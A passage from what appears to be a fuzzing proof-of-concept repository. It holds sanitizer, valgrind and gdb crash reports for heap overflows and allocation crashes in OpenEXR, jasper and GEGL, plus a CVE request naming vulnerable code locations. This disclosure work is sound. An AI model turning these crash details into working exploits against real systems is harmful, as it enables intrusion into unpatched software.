const*, int, int, char const*&) ../../openexr/OpenEXR/IlmImf/ImfPizCompressor.cpp:288 16 | #4 0x7fc23ea66bb7 in execute ../../openexr/OpenEXR/IlmImf/ImfScanLineInputFile.cpp:544 17 | #5 0x7fc23d4081ea in IlmThread_2_2::ThreadPool::addTask(IlmThread_2_2::Task*) ../../openexr/IlmBase/IlmThread/IlmThreadPool.cpp:433 18 | #6 0x7fc23ea7c136 in Imf_2_2::ScanLineInputFile::readPixels(int, int) ../../openexr/OpenEXR/IlmImf/ImfScanLineInputFile.cpp:1617 19 | #7 0x7fc23e904c7c in Imf_2_2::InputFile::readPixels(int, int) ../../openexr/OpenEXR/IlmImf/ImfInputFile.cpp:815 20 | #8 0x4236ed in makeTiled(char const*, char const*, int, Imf_2_2::LevelMode, Imf_2_2::LevelRoundingMode, Imf_2_2::Compression, int, int, std::set, std::allocator > const&, Extrapolation, Extrapolation, bool) ../../openexr/OpenEXR/exrmaketiled/makeTiled.cpp:572 21 | #9 0x405283 in main ../../openexr/OpenEXR/exrmaketiled/main.cpp:426 22 | #10 0x7fc23dd55f44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) 23 | #11 0x40692c (/data/xqx/tests/openexr-test/aflbuild/build-openexr/install/bin/exrmaketiled+0x40692c) 24 | 25 | 0x63100003c7fe is located 2 bytes to the left of 76800-byte region [0x63100003c800,0x63100004f400) 26 | allocated by thread T0 here: 27 | #0 0x7fc23f54a27f in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5527f) 28 | #1 0x7fc23e96adf0 in Imf_2_2::PizCompressor::PizCompressor(Imf_2_2::Header const&, unsigned long, unsigned long) ../../openexr/OpenEXR/IlmImf/ImfPizCompressor.cpp:194 29 | 30 | SUMMARY: AddressSanitizer: heap-buffer-overflow ../../openexr/OpenEXR/IlmImf/ImfHuf.cpp:898 hufDecode 31 | Shadow bytes around the buggy address: 32 | 0x0c627ffff8a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 33 | 0x0c627ffff8b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 34 | 0x0c627ffff8c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 35 | 0x0c627ffff8d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 36 | 0x0c627ffff8e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 37 | =>0x0c627ffff8f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] 38 | 0x0c627ffff900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 39 | 0x0c627ffff910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 | 0x0c627ffff920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 | 0x0c627ffff930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 | 0x0c627ffff940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 | Shadow byte legend (one shadow byte represents 8 application bytes): 44 | Addressable: 00 45 | Partially addressable: 01 02 03 04 05 06 07 46 | Heap left redzone: fa 47 | Heap right redzone: fb 48 | Freed heap region: fd 49 | Stack left redzone: f1 50 | Stack mid redzone: f2 51 | Stack right redzone: f3 52 | Stack partial redzone: f4 53 | Stack after return: f5 54 | Stack use after scope: f8 55 | Global redzone: f9 56 | Global init order: f6 57 | Poisoned by user: f7 58 | Contiguous container OOB:fc 59 | ASan internal: fe 60 | ==18567==ABORTING 61 | ``` 62 | 63 | 64 | results as following by using valgrind 65 | 66 | ``` 67 | valgrind ./exrmaketiled ../../../../../bug-testcase/185-openexr-heapoverflow /tmp/out 68 | ==18448== Memcheck, a memory error detector 69 | ==18448== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 70 | ==18448== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info 71 | ==18448== Command: ./exrmaketiled ../../../../../bug-testcase/185-openexr-heapoverflow /tmp/out 72 | ==18448== 73 | ==18448== Invalid read of size 2 74 | ==18448== at 0x52FBDCB: hufDecode (ImfHuf.cpp:898) 75 | ==18448== by 0x52FBDCB: Imf_2_2::hufUncompress(char const*, int, unsigned short*, int) (ImfHuf.cpp:1101) 76 | ==18448== by 0x52FDB29: Imf_2_2::PizCompressor::uncompress(char const*, int, Imath_2_2::Box >, char const*&) (ImfPizCompressor.cpp:576) 77 | ==18448== by 0x52FDF26: Imf_2_2::PizCompressor::uncompress(char const*, int, int, char const*&) (ImfPizCompressor.cpp:288) 78 | ==18448== by 0x532099C: Imf_2_2::(anonymous namespace)::LineBufferTask::execute() (ImfScanLineInputFile.cpp:544) 79 | ==18448== by 0x649B708: IlmThread_2_2::ThreadPool::addTask(IlmThread_2_2::Task*) (IlmThreadPool.cpp:433) 80 | ==18448== by 0x5323DDA: Imf_2_2::ScanLineInputFile::readPixels(int, int) (ImfScanLineInputFile.cpp:1617) 81 | ==18448== by 0x52F1445: Imf_2_2::InputFile::readPixels(int, int) (ImfInputFile.cpp:815) 82 | ==18448== by 0x4094D3: makeTiled(char const*, char const*, int, Imf_2_2::LevelMode, Imf_2_2::LevelRoundingMode, Imf_2_2::Compression, int, int, std::set, std::allocator > const&, Extrapolation, Extrapolation, bool) (makeTiled.cpp:572) 83 | ==18448== by 0x403F02: main (main.cpp:426) 84 | ==18448== Address 0x6a3effe is 2 bytes before a block of size 76,800 alloc'd 85 | ==18448== at 0x4C2B800: operator new[](unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 86 | ==18448== by 0x52FD6E7: Imf_2_2::PizCompressor::PizCompressor(Imf_2_2::Header const&, unsigned long, unsigned long) (ImfPizCompressor.cpp:194) 87 | ==18448== by 0x52FCC3F: Imf_2_2::newCompressor(Imf_2_2::Compression, unsigned long, Imf_2_2::Header const&) (ImfCompressor.cpp:148) 88 | ==18448== by 0x5324910: Imf_2_2::ScanLineInputFile::initialize(Imf_2_2::Header const&) (ImfScanLineInputFile.cpp:1120) 89 | ==18448== by 0x5324C3B: Imf_2_2::ScanLineInputFile::ScanLineInputFile(Imf_2_2::InputPartData*) (ImfScanLineInputFile.cpp:1166) 90 | ==18448== by 0x52F0324: Imf_2_2::InputFile::initialize() (ImfInputFile.cpp:592) 91 | ==18448== by 0x52F0867: Imf_2_2::InputFile::InputFile(Imf_2_2::InputPartData*) (ImfInputFile.cpp:477) 92 | ==18448== by 0x534542B: Imf_2_2::InputFile* Imf_2_2::MultiPartInputFile::getInputPart(int) (ImfMultiPartInputFile.cpp:185) 93 | ==18448== by 0x5345E7D: Imf_2_2::InputPart::InputPart(Imf_2_2::MultiPartInputFile&, int) (ImfInputPart.cpp:44) 94 | ==18448== by 0x409174: makeTiled(char const*, char const*, int, Imf_2_2::LevelMode, Imf_2_2::LevelRoundingMode, Imf_2_2::Compression, int, int, std::set, std::allocator > const&, Extrapolation, Extrapolation, bool) (makeTiled.cpp:535) 95 | ==18448== by 0x403F02: main (main.cpp:426) 96 | ==18448== 97 | Error reading pixel data from image file "../../../../../bug-testcase/185-openexr-heapoverflow". Error in Huffman-encoded data (invalid code). 98 | ==18448== 99 | ==18448== HEAP SUMMARY: 100 | ==18448== in use at exit: 74,192 bytes in 31 blocks 101 | ==18448== total heap usage: 551 allocs, 520 frees, 3,823,049 bytes allocated 102 | ==18448== 103 | ==18448== LEAK SUMMARY: 104 | ==18448== definitely lost: 0 bytes in 0 blocks 105 | ==18448== indirectly lost: 0 bytes in 0 blocks 106 | ==18448== possibly lost: 0 bytes in 0 blocks 107 | ==18448== still reachable: 74,192 bytes in 31 blocks 108 | ==18448== suppressed: 0 bytes in 0 blocks 109 | ==18448== Rerun with --leak-check=full to see details of leaked memory 110 | ==18448== 111 | ==18448== For counts of detected and suppressed errors, rerun with: -v 112 | ==18448== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) 113 | ``` 114 | 115 | -------------------------------------------------------------------------------- /cve-request/cve-request-1.txt: -------------------------------------------------------------------------------- 1 | Description: 2 | jasper is an open-source initiative to provide a free software-based reference 3 | implementation of the codec specified in the JPEG-2000 Part-1 standard. 4 | 5 | A crafted image causes a read overflow in the latest version 2.0.12. 6 | And this issue also exsits in the latest commit of github repo. 7 | (https://github.com/mdadams/jasper) 8 | 9 | 10 | 11 | The complete ASan output: 12 | # ./install/bin/jasper -f $FILE -F /tmp/1.pnm -T pnm 13 | ================================================================= 14 | ==1220==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000ee18 at pc 0x7fe8a1e0211b bp 0x7fffb4a6cb20 sp 0x7fffb4a6cb18 15 | READ of size 8 at 0x60300000ee18 thread T0 16 | #0 0x7fe8a1e0211a in jp2_decode /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/jp2/jp2_dec.c:405 17 | #1 0x7fe8a1ddc192 in jas_image_decode /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/base/jas_image.c:444 18 | #2 0x40217a in main /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/appl/jasper.c:236 19 | #3 0x7fe8a1a00f44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) 20 | #4 0x401958 (/data/xqx/tests/libjasper-test/codes/abuild/install/bin/jasper+0x401958) 21 | 22 | 0x60300000ee18 is located 0 bytes to the right of 24-byte region [0x60300000ee00,0x60300000ee18) 23 | allocated by thread T0 here: 24 | #0 0x7fe8a2125862 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x54862) 25 | #1 0x7fe8a1de5ec3 in jas_malloc /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/base/jas_malloc.c:242 26 | #2 0x7fe8a1de6072 in jas_alloc2 /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/base/jas_malloc.c:275 27 | #3 0x7fe8a1dfb896 in jp2_cdef_getdata /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/jp2/jp2_cod.c:468 28 | #4 0x7fe8a1dfaa46 in jp2_box_get /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/jp2/jp2_cod.c:303 29 | #5 0x7fe8a1e0015a in jp2_decode /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/jp2/jp2_dec.c:159 30 | #6 0x7fe8a1ddc192 in jas_image_decode /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/base/jas_image.c:444 31 | #7 0x40217a in main /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/appl/jasper.c:236 32 | #8 0x7fe8a1a00f44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) 33 | 34 | SUMMARY: AddressSanitizer: heap-buffer-overflow /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/jp2/jp2_dec.c:405 jp2_decode 35 | Shadow bytes around the buggy address: 36 | 0x0c067fff9d70: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 37 | 0x0c067fff9d80: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 38 | 0x0c067fff9d90: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 39 | 0x0c067fff9da0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 40 | 0x0c067fff9db0: fd fa fa fa fd fd fd fd fa fa fd fd fd fa fa fa 41 | =>0x0c067fff9dc0: 00 00 00[fa]fa fa 00 00 00 00 fa fa 00 00 00 00 42 | 0x0c067fff9dd0: fa fa 00 00 00 02 fa fa 00 00 07 fa fa fa 00 00 43 | 0x0c067fff9de0: 05 fa fa fa 00 00 07 fa fa fa 00 00 00 06 fa fa 44 | 0x0c067fff9df0: 00 00 00 06 fa fa 00 00 00 06 fa fa 00 00 06 fa 45 | 0x0c067fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 46 | 0x0c067fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 47 | Shadow byte legend (one shadow byte represents 8 application bytes): 48 | Addressable: 00 49 | Partially addressable: 01 02 03 04 05 06 07 50 | Heap left redzone: fa 51 | Heap right redzone: fb 52 | Freed heap region: fd 53 | Stack left redzone: f1 54 | Stack mid redzone: f2 55 | Stack right redzone: f3 56 | Stack partial redzone: f4 57 | Stack after return: f5 58 | Stack use after scope: f8 59 | Global redzone: f9 60 | Global init order: f6 61 | Poisoned by user: f7 62 | Contiguous container OOB:fc 63 | ASan internal: fe 64 | ==1220==ABORTING 65 | 66 | 67 | 68 | Affected version: 69 | the Latest version 2.0.12, and also in the latest commit 1cce277. 70 | 71 | Fixed version: 72 | N/A 73 | 74 | Commit fix: 75 | N/A 76 | 77 | Credit: 78 | the bug is found by Qixue Xiao and Kang Li. 79 | 80 | 81 | CVE: 82 | N/A 83 | 84 | Reproducer: 85 | https://github.com/xiaoqx/pocs/blob/master/026-jasper-jps_decode-heapoverflow 86 | 87 | Timeline: 88 | 2017-06-14: bug discovered and reported upstream 89 | 90 | 91 | Note: 92 | This bug was found with American Fuzzy Lop. 93 | 94 | 95 | -- 96 | xiaoqixue_1@163.com 97 | 98 | 99 | 100 | 101 | 102 | ----------------------------------------------------------------------------------------- 103 | 104 | bug details : 105 | 106 | ./install/bin/jasper -f /tmp/026-jasper-jps_decode-heapoverflow -F /tmp/1.pnm -T pnm 107 | ================================================================= 108 | ==1220==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000ee18 at pc 0x7fe8a1e0211b bp 0x7fffb4a6cb20 sp 0x7fffb4a6cb18 109 | READ of size 8 at 0x60300000ee18 thread T0 110 | #0 0x7fe8a1e0211a in jp2_decode /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/jp2/jp2_dec.c:405 111 | #1 0x7fe8a1ddc192 in jas_image_decode /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/base/jas_image.c:444 112 | #2 0x40217a in main /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/appl/jasper.c:236 113 | #3 0x7fe8a1a00f44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) 114 | #4 0x401958 (/data/xqx/tests/libjasper-test/codes/abuild/install/bin/jasper+0x401958) 115 | 116 | 0x60300000ee18 is located 0 bytes to the right of 24-byte region [0x60300000ee00,0x60300000ee18) 117 | allocated by thread T0 here: 118 | #0 0x7fe8a2125862 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x54862) 119 | #1 0x7fe8a1de5ec3 in jas_malloc /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/base/jas_malloc.c:242 120 | #2 0x7fe8a1de6072 in jas_alloc2 /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/base/jas_malloc.c:275 121 | #3 0x7fe8a1dfb896 in jp2_cdef_getdata /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/jp2/jp2_cod.c:468 122 | #4 0x7fe8a1dfaa46 in jp2_box_get /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/jp2/jp2_cod.c:303 123 | #5 0x7fe8a1e0015a in jp2_decode /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/jp2/jp2_dec.c:159 124 | #6 0x7fe8a1ddc192 in jas_image_decode /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/base/jas_image.c:444 125 | #7 0x40217a in main /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/appl/jasper.c:236 126 | #8 0x7fe8a1a00f44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) 127 | 128 | SUMMARY: AddressSanitizer: heap-buffer-overflow /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/jp2/jp2_dec.c:405 jp2_decode 129 | Shadow bytes around the buggy address: 130 | 0x0c067fff9d70: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 131 | 0x0c067fff9d80: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 132 | 0x0c067fff9d90: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 133 | 0x0c067fff9da0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 134 | 0x0c067fff9db0: fd fa fa fa fd fd fd fd fa fa fd fd fd fa fa fa 135 | =>0x0c067fff9dc0: 00 00 00[fa]fa fa 00 00 00 00 fa fa 00 00 00 00 136 | 0x0c067fff9dd0: fa fa 00 00 00 02 fa fa 00 00 07 fa fa fa 00 00 137 | 0x0c067fff9de0: 05 fa fa fa 00 00 07 fa fa fa 00 00 00 06 fa fa 138 | 0x0c067fff9df0: 00 00 00 06 fa fa 00 00 00 06 fa fa 00 00 06 fa 139 | 0x0c067fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 140 | 0x0c067fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 141 | Shadow byte legend (one shadow byte represents 8 application bytes): 142 | Addressable: 00 143 | Partially addressable: 01 02 03 04 05 06 07 144 | Heap left redzone: fa 145 | Heap right redzone: fb 146 | Freed heap region: fd 147 | Stack left redzone: f1 148 | Stack mid redzone: f2 149 | Stack right redzone: f3 150 | Stack partial redzone: f4 151 | Stack after return: f5 152 | Stack use after scope: f8 153 | Global redzone: f9 154 | Global init order: f6 155 | Poisoned by user: f7 156 | Contiguous container OOB:fc 157 | ASan internal: fe 158 | ==1220==ABORTING 159 | 160 | 161 | ============================================== 162 | 163 | jasper --input $FILE --output /tmp/1.ppm --output-format pnm 164 | ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000ee18 at pc 0x7f962fff7417 bp 0x7ffc795e5c40 sp 0x7ffc795e5c38 165 | READ of size 8 at 0x60300000ee18 thread T0 166 | #0 0x7f962fff7416 in jp2_decode /data/xqx/tests/libjasper-test/jasper/src/libjasper/jp2/jp2_dec.c:405 167 | #1 0x7f962ff96880 in jas_image_decode /data/xqx/tests/libjasper-test/jasper/src/libjasper/base/jas_image.c:442 168 | #2 0x4020fb in main /data/xqx/tests/libjasper-test/jasper/src/appl/jasper.c:236 169 | #3 0x7f962fb63f44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) 170 | #4 0x4035ec (/data/xqx/tests/libjasper-test/aflbuild/install/bin/jasper+0x4035ec) 171 | 172 | 0x60300000ee18 is located 0 bytes to the right of 24-byte region [0x60300000ee00,0x60300000ee18) 173 | allocated by thread T0 here: 174 | #0 0x7f96303a9862 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x54862) 175 | #1 0x7f962ffa55d2 in jas_malloc /data/xqx/tests/libjasper-test/jasper/src/libjasper/base/jas_malloc.c:241 176 | 177 | SUMMARY: AddressSanitizer: heap-buffer-overflow /data/xqx/tests/libjasper-test/jasper/src/libjasper/jp2/jp2_dec.c:405 jp2_decode 178 | Shadow bytes around the buggy address: 179 | 0x0c067fff9d70: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 180 | 0x0c067fff9d80: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 181 | 0x0c067fff9d90: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 182 | 0x0c067fff9da0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 183 | 0x0c067fff9db0: fd fa fa fa fd fd fd fd fa fa fd fd fd fa fa fa 184 | =>0x0c067fff9dc0: 00 00 00[fa]fa fa 00 00 00 00 fa fa 00 00 00 00 185 | 0x0c067fff9dd0: fa fa 00 00 00 02 fa fa 00 00 07 fa fa fa 00 00 186 | 0x0c067fff9de0: 05 fa fa fa 00 00 07 fa fa fa 00 00 00 06 fa fa 187 | 0x0c067fff9df0: 00 00 00 06 fa fa 00 00 00 06 fa fa 00 00 06 fa 188 | 0x0c067fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 189 | 0x0c067fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 190 | Shadow byte legend (one shadow byte represents 8 application bytes): 191 | Addressable: 00 192 | Partially addressable: 01 02 03 04 05 06 07 193 | Heap left redzone: fa 194 | Heap right redzone: fb 195 | Freed heap region: fd 196 | Stack left redzone: f1 197 | Stack mid redzone: f2 198 | Stack right redzone: f3 199 | Stack partial redzone: f4 200 | Stack after return: f5 201 | Stack use after scope: f8 202 | Global redzone: f9 203 | Global init order: f6 204 | Poisoned by user: f7 205 | Contiguous container OOB:fc 206 | ASan internal: fe 207 | -------------------------------------------------------------------------------- /gegl/readme.md: -------------------------------------------------------------------------------- 1 | gegl poc 2 | ================== 3 | 4 | ## 1. gegl-outbound-write-1 5 | 6 | ``` 7 | (gdb) run ./gegl-outbound-write-1 8 | The program being debugged has been started already. 9 | Start it from the beginning? (y or n) y 10 | Starting program: /src/aflbuild/installed/bin/gegl ./gegl-outbound-write-1 11 | [Thread debugging using libthread_db enabled] 12 | Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 13 | 14 | (gegl:303): GEGL-WARNING **: Failed to set operation type gegl:text, using a passthrough op instead 15 | 16 | (gegl:303): GEGL-WARNING **: Failed to set operation type gegl:text, using a passthrough op instead 17 | 18 | ** (gegl:303): WARNING **: No display handler operation found for gegl:display 19 | [New Thread 0x7fffef432700 (LWP 304)] 20 | 21 | Thread 1 "gegl" received signal SIGSEGV, Segmentation fault. 22 | __memcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:37 23 | 37 ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S: No such file or directory. 24 | (gdb) exploitable 25 | Description: Access violation on destination operand 26 | Short description: DestAv (8/22) 27 | Hash: d7482cdb03f2cb0b586cd5cf74b1cb43.f4d790321ded280ed3837c295823fc52 28 | Exploitability Classification: EXPLOITABLE 29 | Explanation: The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. 30 | Other tags: AccessViolation (21/22) 31 | (gdb) bt 32 | #0 __memcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:37 33 | #1 0x00007ffff7a8d051 in memcpy (__len=384, __src=0x7ffff7f441a0, __dest=) at /usr/include/x86_64-linux-gnu/bits/string3.h:53 34 | #2 gegl_buffer_iterate_read_simple (buffer=buffer@entry=0x7491a0, roi=roi@entry=0x7fffffffd140, buf=buf@entry=0x7ffde0cea010 "", buf_stride=buf_stride@entry=-2118217885, format=format@entry=0x63cb40, 35 | level=level@entry=0) at ../../../gegl/gegl/buffer/gegl-buffer-access.c:1212 36 | #3 0x00007ffff7a9d115 in gegl_buffer_iterate_read_dispatch (buffer=0x7491a0, roi=, buf=0x7ffde0cea010 "", rowstride=-2118217885, format=0x63cb40, repeat_mode=GEGL_ABYSS_NONE, level=0) 37 | at ../../../gegl/gegl/buffer/gegl-buffer-access.c:1832 38 | #4 0x00007ffff7aa6f41 in _gegl_buffer_get_unlocked (buffer=0x7491a0, scale=, rect=0x7fffffffd370, format=, dest_buf=0x7ffde0cea010, rowstride=0, flags=GEGL_ABYSS_NONE) 39 | at ../../../gegl/gegl/buffer/gegl-buffer-access.c:2055 40 | #5 0x00007fffef8440ba in process (operation=, output=0x7491a0, result=, level=) at ../../../gegl/operations/external/ppm-load.c:320 41 | #6 0x00007ffff7b41bfe in gegl_operation_source_process (operation=0x6cc260, context=, output_prop=, result=0x740450, level=0) 42 | at ../../../gegl/gegl/operation/gegl-operation-source.c:182 43 | #7 0x00007ffff7b6b0ae in gegl_graph_process (path=0x73b470, level=level@entry=0) at ../../../gegl/gegl/process/gegl-graph-traversal.c:469 44 | #8 0x00007ffff7b67fe8 in gegl_eval_manager_apply (self=0x73fb80, roi=roi@entry=0x748cc0, level=level@entry=0) at ../../../gegl/gegl/process/gegl-eval-manager.c:128 45 | #9 0x00007ffff7b51f7e in gegl_node_apply_roi (level=0, roi=0x748cc0, self=0x696050) at ../../../gegl/gegl/graph/gegl-node.c:1081 46 | #10 gegl_node_blit (self=0x696050, scale=1, roi=roi@entry=0x748cc0, format=format@entry=0x63cb40, destination_buf=destination_buf@entry=0x7fffe7c8e010, rowstride=-2118217885, rowstride@entry=0, 47 | flags=flags@entry=GEGL_BLIT_DEFAULT) at ../../../gegl/gegl/graph/gegl-node.c:1161 48 | #11 0x00007ffff7b6f928 in render_rectangle (processor=0x734c60) at ../../../gegl/gegl/process/gegl-processor.c:518 49 | #12 gegl_processor_render (progress=0x0, rectangle=0x734c88, processor=0x734c60) at ../../../gegl/gegl/process/gegl-processor.c:662 50 | #13 gegl_processor_work (processor=processor@entry=0x734c60, progress=progress@entry=0x0) at ../../../gegl/gegl/process/gegl-processor.c:796 51 | #14 0x00007ffff7b50a5a in gegl_node_process (self=) at ../../../gegl/gegl/graph/gegl-node.c:1827 52 | #15 0x00000000004039ea in main (argc=, argv=) at ../../gegl/bin/gegl.c:255 53 | ``` 54 | 55 | ## 2. gegl-dos-1 56 | 57 | ``` 58 | $ gdb --args gegl $POC 59 | [Thread debugging using libthread_db enabled] 60 | Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 61 | 62 | (gegl:387): GEGL-WARNING **: Failed to set operation type gegl:text, using a passthrough op instead 63 | 64 | (gegl:387): GEGL-WARNING **: Failed to set operation type gegl:text, using a passthrough op instead 65 | 66 | ** (gegl:387): WARNING **: No display handler operation found for gegl:display 67 | [New Thread 0x7fffef432700 (LWP 391)] 68 | 69 | (gegl:387): GLib-ERROR **: /build/glib2.0-prJhLS/glib2.0-2.48.2/./glib/gmem.c:100: failed to allocate 18446744071565764224 bytes 70 | 71 | Thread 1 "gegl" received signal SIGTRAP, Trace/breakpoint trap. 72 | 0x00007ffff74dba5b in g_logv () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 73 | (gdb) bt 74 | #0 0x00007ffff74dba5b in g_logv () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 75 | #1 0x00007ffff74dbbcf in g_log () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 76 | #2 0x00007ffff74da744 in g_malloc () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 77 | #3 0x00007ffff7b6f8a2 in render_rectangle (processor=0x735460) at ../../../gegl/gegl/process/gegl-processor.c:512 78 | #4 gegl_processor_render (progress=0x0, rectangle=0x735488, processor=0x735460) at ../../../gegl/gegl/process/gegl-processor.c:662 79 | #5 gegl_processor_work (processor=processor@entry=0x735460, progress=progress@entry=0x0) at ../../../gegl/gegl/process/gegl-processor.c:796 80 | #6 0x00007ffff7b50a5a in gegl_node_process (self=) at ../../../gegl/gegl/graph/gegl-node.c:1827 81 | #7 0x00000000004039ea in main (argc=, argv=) at ../../gegl/bin/gegl.c:255 82 | ``` 83 | 84 | ## 3. gegl-dos-2 85 | 86 | ``` 87 | $ gdb --args gegl $POC 88 | Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 89 | 90 | (gegl:394): GEGL-WARNING **: Failed to set operation type gegl:text, using a passthrough op instead 91 | 92 | (gegl:394): GEGL-WARNING **: Failed to set operation type gegl:text, using a passthrough op instead 93 | 94 | ** (gegl:394): WARNING **: No display handler operation found for gegl:display 95 | [New Thread 0x7fffef432700 (LWP 398)] 96 | 97 | (gegl:394): GLib-ERROR **: /build/glib2.0-prJhLS/glib2.0-2.48.2/./glib/gmem.c:100: failed to allocate 1333333333323288 bytes 98 | 99 | Thread 1 "gegl" received signal SIGTRAP, Trace/breakpoint trap. 100 | 0x00007ffff74dba5b in g_logv () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 101 | (gdb) bt 102 | #0 0x00007ffff74dba5b in g_logv () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 103 | #1 0x00007ffff74dbbcf in g_log () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 104 | #2 0x00007ffff74da744 in g_malloc () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 105 | #3 0x00007fffef843f20 in process (operation=, output=0x7491a0, result=, 106 | level=) at ../../../gegl/operations/external/ppm-load.c:293 107 | #4 0x00007ffff7b41bfe in gegl_operation_source_process (operation=0x6cc460, context=, 108 | output_prop=, result=0x740450, level=0) 109 | at ../../../gegl/gegl/operation/gegl-operation-source.c:182 110 | #5 0x00007ffff7b6b0ae in gegl_graph_process (path=0x747160, level=level@entry=0) 111 | at ../../../gegl/gegl/process/gegl-graph-traversal.c:469 112 | #6 0x00007ffff7b67fe8 in gegl_eval_manager_apply (self=0x73ff80, roi=roi@entry=0x746d40, 113 | level=level@entry=0) at ../../../gegl/gegl/process/gegl-eval-manager.c:128 114 | #7 0x00007ffff7b51f7e in gegl_node_apply_roi (level=0, roi=0x746d40, self=0x696050) 115 | at ../../../gegl/gegl/graph/gegl-node.c:1081 116 | #8 gegl_node_blit (self=0x696050, scale=1, roi=roi@entry=0x746d40, format=format@entry=0x63cb20, 117 | destination_buf=destination_buf@entry=0x7ffff7ee9010, rowstride=24, rowstride@entry=0, 118 | flags=flags@entry=GEGL_BLIT_DEFAULT) at ../../../gegl/gegl/graph/gegl-node.c:1161 119 | #9 0x00007ffff7b6f928 in render_rectangle (processor=0x735460) 120 | at ../../../gegl/gegl/process/gegl-processor.c:518 121 | #10 gegl_processor_render (progress=0x0, rectangle=0x735488, processor=0x735460) 122 | at ../../../gegl/gegl/process/gegl-processor.c:662 123 | #11 gegl_processor_work (processor=processor@entry=0x735460, progress=progress@entry=0x0) 124 | at ../../../gegl/gegl/process/gegl-processor.c:796 125 | #12 0x00007ffff7b50a5a in gegl_node_process (self=) 126 | at 